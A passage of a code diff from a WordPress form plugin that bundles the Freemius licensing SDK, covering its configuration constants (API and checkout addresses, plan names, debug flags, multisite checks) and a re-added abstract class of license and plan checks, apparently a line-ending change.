+        define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
+    }
+
+
+    #--------------------------------------------------------------------------------
+    #region API
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
+    }
+    if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
+    }
+
+    // Set API address for local testing.
+    if ( ! WP_FS__IS_PRODUCTION_MODE ) {
+        if ( ! defined( 'FS_API__ADDRESS' ) ) {
+            define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
+        }
+        if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
+            define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
+        }
+    }
+
+    #endregion
+
+    #--------------------------------------------------------------------------------
+    #region Checkout
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
+    }
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
+    }
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
+    }
+
+    #endregion
+
+    define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
+
+    if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
+        define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
+    }
+    if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
+        define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
+    }
+    if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
+        define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
+    }
+    define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
+
+    /**
+     * Module types
+     *
+     * @since 1.2.2
+     */
+    define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
+    define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
+
+    /**
+     * Billing Frequencies
+     */
+    define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
+    define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
+    define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
+
+    /**
+     * Plans
+     */
+    define( 'WP_FS__PLAN_DEFAULT_PAID', false );
+    define( 'WP_FS__PLAN_FREE', 'free' );
+    define( 'WP_FS__PLAN_TRIAL', 'trial' );
+
+    /**
+     * Times in seconds
+     */
+    if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
+    }
+    if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
+    }
+//	define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
+    if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
+    }
+    if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
+    }
+    if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region Debugging
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
+        $debug_mode = get_option( 'fs_debug_mode', null );
+
+        if ( $debug_mode === null ) {
+            $debug_mode = false;
+            add_option( 'fs_debug_mode', $debug_mode );
+        }
+
+        define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
+    }
+
+    if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
+        define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
+    }
+    if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
+        define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
+    }
+    if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
+        define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
+    }
+
+    if ( WP_FS__ECHO_DEBUG_SDK ) {
+        error_reporting( E_ALL );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
+        define( 'WP_FS__SCRIPT_START_TIME', time() );
+    }
+    if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
+        define( 'WP_FS__DEFAULT_PRIORITY', 10 );
+    }
+    if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
+        define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region Multisite Network
+    #--------------------------------------------------------------------------------
+
+    /**
+     * Do not use this define directly, it will have the wrong value
+     * during plugin uninstall/deletion when the inclusion of the plugin
+     * is triggered due to registration with register_uninstall_hook().
+     *
+     * Instead, use fs_is_network_admin().
+     *
+     * @author Vova Feldman (@svovaf)
+     */
+    if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
+        define( 'WP_FS__IS_NETWORK_ADMIN',
+            is_multisite() &&
+            ( is_network_admin() ||
+              ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
+                  ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
+                    ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
+                ) ||
+                // Plugin uninstall.
+                defined( 'WP_UNINSTALL_PLUGIN' ) )
+            )
+        );
+    }
+
+    /**
+     * Do not use this define directly, it will have the wrong value
+     * during plugin uninstall/deletion when the inclusion of the plugin
+     * is triggered due to registration with register_uninstall_hook().
+     *
+     * Instead, use fs_is_blog_admin().
+     *
+     * @author Vova Feldman (@svovaf)
+     */
+    if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
+        define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
+    }
+
+    if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
+        // Set to true to show network level settings even if delegated to site admins.
+        define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
+        define( 'WP_FS__DEMO_MODE', false );
+    }
+    if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
+        define( 'FS_SDK__SSLVERIFY', false );
+    }
--- a/acf-frontend-form-element/main/freemius/includes/class-freemius-abstract.php
+++ b/acf-frontend-form-element/main/freemius/includes/class-freemius-abstract.php
@@ -1,538 +1,538 @@
-<?php
-	/**
-	 * @package     Freemius
-	 * @copyright   Copyright (c) 2015, Freemius, Inc.
-	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-	 * @since       1.0.7
-	 */
-
-	if ( ! defined( 'ABSPATH' ) ) {
-		exit;
-	}
-
-
-	/**
-	 * - Each instance of Freemius class represents a single plugin
-	 * install by a single user (the installer of the plugin).
-	 *
-	 * - Each website can only have one install of the same plugin.
-	 *
-	 * - Install entity is only created after a user connects his account with Freemius.
-	 *
-	 * Class Freemius_Abstract
-	 */
-	abstract class Freemius_Abstract {
-
-		#----------------------------------------------------------------------------------
-		#region Identity
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if user has connected his account (opted-in).
-		 *
-		 * Note:
-		 *      If the user opted-in and opted-out on a later stage,
-		 *      this will still return true. If you want to check if the
-		 *      user is currently opted-in, use:
-		 *          `$fs->is_registered() && $fs->is_tracking_allowed()`
-		 *
-		 * @since 1.0.1
-         *
-         * @param bool $ignore_anonymous_state Since 2.5.1
-         *
-		 * @return bool
-		 */
-		abstract function is_registered( $ignore_anonymous_state = false );
-
-		/**
-		 * Check if the user skipped connecting the account with Freemius.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_anonymous();
-
-		/**
-		 * Check if the user currently in activation mode.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_activation_mode();
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Module Type
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Checks if the plugin's type is "plugin". The other type is "theme".
-		 *
-		 * @author Leo Fajardo (@leorw)
-		 * @since  1.2.2
-		 *
-		 * @return bool
-		 */
-		abstract function is_plugin();
-
-		/**
-		 * Checks if the module type is "theme". The other type is "plugin".
-		 *
-		 * @author Leo Fajardo (@leorw)
-		 * @since  1.2.2
-		 *
-		 * @return bool
-		 */
-		function is_theme() {
-			return ( ! $this->is_plugin() );
-		}
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Permissions
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if plugin must be WordPress.org compliant.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_org_repo_compliant();
-
-		/**
-		 * Check if plugin is allowed to install executable files.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.5
-		 *
-		 * @return bool
-		 */
-		function is_allowed_to_install() {
-			return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
-		}
-
-		#endregion
-
-		/**
-		 * Check if user in trial or in free plan (not paying).
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.4
-		 *
-		 * @return bool
-		 */
-		function is_not_paying() {
-			return ( $this->is_trial() || $this->is_free_plan() );
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_paying();
-
-		/**
-		 * Check if the user is paying or in trial.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is_paying_or_trial() {
-			return ( $this->is_paying() || $this->is_trial() );
-		}
-
-		/**
-		 * Check if user in a trial or have feature enabled license.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.7
-		 *
-		 * @return bool
-		 */
-		abstract function can_use_premium_code();
-
-		#----------------------------------------------------------------------------------
-		#region Premium Only
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * All logic wrapped in methods with "__premium_only()" suffix will be only
-		 * included in the premium code.
-		 *
-		 * Example:
-		 *      if ( freemius()->is__premium_only() ) {
-		 *          ...
-		 *      }
-		 */
-
-		/**
-		 * Returns true when running premium plugin code.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is__premium_only() {
-			return $this->is_premium();
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 *
-		 */
-		function is_paying__premium_only() {
-			return ( $this->is__premium_only() && $this->is_paying() );
-		}
-
-		/**
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan__premium_only( $plan, $exact = false ) {
-			return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
-		}
-
-		/**
-		 * Check if plan matches active license' plan or active trial license' plan.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan_or_trial__premium_only( $plan, $exact = false ) {
-			return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
-		}
-
-		/**
-		 * Check if the user is paying or in trial.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is_paying_or_trial__premium_only() {
-			return $this->is_premium() && $this->is_paying_or_trial();
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since      1.0.4
-		 *
-		 * @return bool
-		 *
-		 * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
-		 * @using      Alias to is_paying__premium_only()
-		 */
-		function is_paying__fs__() {
-			return $this->is_paying__premium_only();
-		}
-
-		/**
-		 * Check if user in a trial or have feature enabled license.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		function can_use_premium_code__premium_only() {
-			return $this->is_premium() && $this->can_use_premium_code();
-		}
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Trial
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if the user in a trial.
-		 *
-		 * @since 1.0.3
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial();
-
-		/**
-		 * Check if trial already utilized.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial_utilized();
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Plans
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if the user is on the free plan of the product.
-		 *
-		 * @since 1.0.4
-		 *
-		 * @return bool
-		 */
-		abstract function is_free_plan();
-
-		/**
-		 * @since  1.0.2
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		abstract function is_plan( $plan, $exact = false );
-
-		/**
-		 * Check if plan based on trial. If not in trial mode, should return false.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial_plan( $plan, $exact = false );
-
-		/**
-		 * Check if plan matches active license' plan or active trial license' plan.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan_or_trial( $plan, $exact = false ) {
-			return $this->is_plan( $plan, $exact ) ||
-			       $this->is_trial_plan( $plan, $exact );
-		}
-
-		/**
-		 * Check if plugin has any paid plans.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function has_paid_plan();
-
-		/**
-		 * Check if plugin has any free plan, or is it premium only.
-		 *
-		 * Note: If no plans configured, assume plugin is free.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function has_free_plan();
-
-		/**
-		 * Check if plugin is premium only (no free plans).
-		 *
-		 * NOTE: is__premium_only() is very different method, don't get confused.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_only_premium();
-
-		/**
-		 * Check if module has a premium code version.
-		 *
-		 * Serviceware module might be freemium without any
-		 * premium code version, where the paid features
-		 * are all part of the service.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.2.1.6
-		 *
-		 * @return bool
-		 */
-		abstract function has_premium_version();
-
-		/**
-		 * Check if module has any release on Freemius,
-		 * or all plugin's code is on WordPress.org (Serviceware).
-		 *
-		 * @return bool
-		 */
-		function has_release_on_freemius() {
-			return ! $this->is_org_repo_compliant() ||
-			       $this->has_premium_version();
-		}
-
-		/**
-		 * Checks if it's a freemium plugin.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		function is_freemium() {
-			return $this->has_paid_plan() &&
-			       $this->has_free_plan();
-		}
-
-		/**
-		 * Check if module has only one plan.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.2.1.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_single_plan();
-
-		#endregion
-
-		/**
-		 * Check if running payments in sandbox mode.
-		 *
-		 * @since 1.0.4
-		 *
-		 * @return bool
-		 */
-		abstract function is_payments_sandbox();
-
-		/**
-		 * Check if running test vs. live plugin.
-		 *
-		 * @since 1.0.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_live();
-
-		/**
-		 * Check if running premium plugin code.
-		 *
-		 * @since 1.0.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_premium();
-
-		/**
-		 * Get upgrade URL.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.2
-		 *
-		 * @param string $period Billing cycle.
-		 *
-		 * @return string
-		 */
-		abstract function get_upgrade_url( $period = WP_FS__PERIOD_ANNUALLY );
-
-		/**
-		 * Check if Freemius was first added in a plugin update.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.5
-		 *
-		 * @return bool
-		 */
-		function is_plugin_update() {
-			return ! $this->is_plugin_new_install();
-		}
-
-		/**
-		 * Check if Freemius was part of the plugin when the user installed it first.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_plugin_new_install();
-
-		#----------------------------------------------------------------------------------
-		#region Marketing
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if current user purchased any other plugins before.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function has_purchased_before();
-
-		/**
-		 * Check if current user classified as an agency.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_agency();
-
-		/**
-		 * Check if current user classified as a developer.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_developer();
-
-		/**
-		 * Check if current user classified as a business.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_business();
-
-		#endregion
+<?php
+	/**
+	 * @package     Freemius
+	 * @copyright   Copyright (c) 2015, Freemius, Inc.
+	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+	 * @since       1.0.7
+	 */
+
+	if ( ! defined( 'ABSPATH' ) ) {
+		exit;
+	}
+
+
+	/**
+	 * - Each instance of Freemius class represents a single plugin
+	 * install by a single user (the installer of the plugin).
+	 *
+	 * - Each website can only have one install of the same plugin.
+	 *
+	 * - Install entity is only created after a user connects his account with Freemius.
+	 *
+	 * Class Freemius_Abstract
+	 */
+	abstract class Freemius_Abstract {
+
+		#----------------------------------------------------------------------------------
+		#region Identity
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if user has connected his account (opted-in).
+		 *
+		 * Note:
+		 *      If the user opted-in and opted-out on a later stage,
+		 *      this will still return true. If you want to check if the
+		 *      user is currently opted-in, use:
+		 *          `$fs->is_registered() && $fs->is_tracking_allowed()`
+		 *
+		 * @since 1.0.1
+         *
+         * @param bool $ignore_anonymous_state Since 2.5.1
+         *
+		 * @return bool
+		 */
+		abstract function is_registered( $ignore_anonymous_state = false );
+
+		/**
+		 * Check if the user skipped connecting the account with Freemius.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_anonymous();
+
+		/**
+		 * Check if the user currently in activation mode.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_activation_mode();
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Module Type
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Checks if the plugin's type is "plugin". The other type is "theme".
+		 *
+		 * @author Leo Fajardo (@leorw)
+		 * @since  1.2.2
+		 *
+		 * @return bool
+		 */
+		abstract function is_plugin();
+
+		/**
+		 * Checks if the module type is "theme". The other type is "plugin".
+		 *
+		 * @author Leo Fajardo (@leorw)
+		 * @since  1.2.2
+		 *
+		 * @return bool
+		 */
+		function is_theme() {
+			return ( ! $this->is_plugin() );
+		}
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Permissions
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if plugin must be WordPress.org compliant.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_org_repo_compliant();
+
+		/**
+		 * Check if plugin is allowed to install executable files.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.5
+		 *
+		 * @return bool
+		 */
+		function is_allowed_to_install() {
+			return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
+		}
+
+		#endregion
+
+		/**
+		 * Check if user in trial or in free plan (not paying).
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.4
+		 *
+		 * @return bool
+		 */
+		function is_not_paying() {
+			return ( $this->is_trial() || $this->is_free_plan() );
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_paying();
+
+		/**
+		 * Check if the user is paying or in trial.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is_paying_or_trial() {
+			return ( $this->is_paying() || $this->is_trial() );
+		}
+
+		/**
+		 * Check if user in a trial or have feature enabled license.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.7
+		 *
+		 * @return bool
+		 */
+		abstract function can_use_premium_code();
+
+		#----------------------------------------------------------------------------------
+		#region Premium Only
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * All logic wrapped in methods with "__premium_only()" suffix will be only
+		 * included in the premium code.
+		 *
+		 * Example:
+		 *      if ( freemius()->is__premium_only() ) {
+		 *          ...
+		 *      }
+		 */
+
+		/**
+		 * Returns true when running premium plugin code.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is__premium_only() {
+			return $this->is_premium();
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 *
+		 */
+		function is_paying__premium_only() {
+			return ( $this->is__premium_only() && $this->is_paying() );
+		}
+
+		/**
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan__premium_only( $plan, $exact = false ) {
+			return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
+		}
+
+		/**
+		 * Check if plan matches active license' plan or active trial license' plan.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan_or_trial__premium_only( $plan, $exact = false ) {
+			return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
+		}
+
+		/**
+		 * Check if the user is paying or in trial.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is_paying_or_trial__premium_only() {
+			return $this->is_premium() && $this->is_paying_or_trial();
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since      1.0.4
+		 *
+		 * @return bool
+		 *
+		 * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
+		 * @using      Alias to is_paying__premium_only()
+		 */
+		function is_paying__fs__() {
+			return $this->is_paying__premium_only();
+		}
+
+		/**
+		 * Check if user in a trial or have feature enabled license.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		function can_use_premium_code__premium_only() {
+			return $this->is_premium() && $this->can_use_premium_code();
+		}
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Trial
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if the user in a trial.
+		 *
+		 * @since 1.0.3
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial();
+
+		/**
+		 * Check if trial already utilized.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial_utilized();
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Plans
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if the user is on the free plan of the product.
+		 *
+		 * @since 1.0.4
+		 *
+		 * @return bool
+		 */
+		abstract function is_free_plan();
+
+		/**
+		 * @since  1.0.2
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		abstract function is_plan( $plan, $exact = false );
+
+		/**
+		 * Check if plan based on trial. If not in trial mode, should return false.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial_plan( $plan, $exact = false );
+
+		/**
+		 * Check if plan matches active license' plan or active trial license' plan.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan_or_trial( $plan, $exact = false ) {
+			return $this->is_plan( $plan, $exact ) ||
+			       $this->is_trial_plan( $plan, $exact );
+		}
+
+		/**
+		 * Check if plugin has any paid plans.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function has_paid_plan();
+
+		/**
+		 * Check if plugin has any free plan, or is it premium only.
+		 *
+		 * Note: If no plans configured, assume plugin is free.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function has_free_plan();
+
+		/**
+		 * Check if plugin is premium only (no free plans).
+		 *
+		 * NOTE: is__premium_only() is very different method, don't get confused.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_only_premium();
+
+		/**
+		 * Check if module has a premium code version.
+		 *
+		 * Serviceware module might be freemium without any
+		 * premium code version, where the paid features
+		 * are all part of the service.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.2.1.6
+		 *
+		 * @return bool
+		 */
+		abstract function has_premium_version();
+
+		/**
+		 * Check if module has any release on Freemius,
+		 * or all plugin's code is on WordPress.org (Serviceware).
+		 *
+		 * @return bool
+		 */
+		function has_release_on_freemius() {
+			return ! $this->is_org_repo_compliant() ||
+			       $this->has_premium_version();
+		}
+
+		/**
+		 * Checks if it's a freemium plugin.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		function is_freemium() {
+			return $this->has_paid_plan() &&
+			       $this->has_free_plan();
+		}
+
+		/**
+		 * Check if module has only one plan.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.2.1.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_single_plan();
+
+		#endregion
+
+		/**
+		 * Check if running payments in sandbox mode.
+		 *
+		 * @since 1.0.4
+		 *
+		 * @return bool
+		 */
+		abstract function is_payments_sandbox();
+
+		/**
+		 * Check if running test vs. live plugin.
+		 *
+		 * @since 1.0.5
+		 *
+		 * @return bool
+		 */
+		abstract function is_live();
+
+		/**
+		 * Check if running premium plugin code.
+		 *
+		 * @since 1.0.5
+		 *
+		 * @return bool
+		 */
+		abstract function is_premium();
+
+		/**
+		 * Get upgrade URL.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.2
+		 *
+		 * @param string $period Billing cycle.
+		 *
+		 * @return string
+		 */
+		abstract function get_upgrade_url( $period = WP_FS__PERIOD_ANNUALLY );
+
+		/**
+		 * Check if Freemius was first added in a plugin update.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.5
+		 *
+		 * @return bool
+		 */
+		function is_plugin_update() {
+			return ! $this->is_plugin_new_install();
+		}
+
+		/**
+		 * Check if Freemius was part of the plugin when the user installed it first.
+		 *
